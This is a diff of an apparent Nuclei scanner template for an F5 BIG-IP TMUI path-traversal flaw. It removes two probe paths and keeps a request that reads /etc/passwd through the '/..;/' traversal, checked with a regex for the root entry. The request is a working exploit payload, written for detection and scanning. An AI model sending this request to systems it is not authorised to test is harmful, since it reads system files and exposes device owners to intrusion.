commit
22c21c3b4a
|
@ -8,21 +8,12 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa"
|
||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp"
|
||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "jaffa"
|
||||
- "Tabset"
|
||||
- "success"
|
||||
condition: and
|
||||
part: body
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
|
|
Loading…
Reference in New Issue